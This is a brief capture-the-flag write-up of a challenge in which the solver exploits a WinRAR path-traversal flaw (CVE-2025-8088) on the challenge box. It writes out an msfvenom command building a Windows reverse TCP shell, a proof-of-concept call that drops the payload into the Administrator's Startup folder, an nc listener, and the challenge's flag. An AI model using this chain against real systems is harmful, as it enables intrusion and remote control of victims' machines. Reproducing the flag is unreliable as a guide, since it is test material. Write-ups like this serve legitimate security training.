Threat Actor Support Line

less than 1 minute read

📦 Threat Actor Support Line

Category Author
📦 Miscellaneous John Hammond

Challenge Prompt

You’ve heard of RaaS, you’ve heard of SaaS… the Threat Actor Support Line brings the two together!

Upload the files you want encrypted, and the service will start up its own hacker computer (as the Administrator user with antivirus disabled, of course) and encrypt them for you!

Problem Type

  • CVE Exploit

Solve

Noticed the page said it was using WinRAR version 7.12.

Found CVE-2025-8088 effects that version.

Got python PoC for CVE-2025-8088 from GitHub:

Built reverse TCP shell with msfvenom:

1
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=<IP> LPORT=7777 -o ~\Downloads\payload.exe

Made a hello.txt file that just said Hello!.

Packaged up using the PoC Python (must do on Windows):

python .\poc.py --decoy .\hello.txt --payload .\payload.exe --drop 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'

We start a listener on our machine

1
nc -lvnp 7777

Uploaded .rar file to box

We get a connection back and we find the flag in C:\ and we read it with more flag.txt.

Flag

flag{6529440ceec226f31a3b2dc0d0b06965}

(back to top)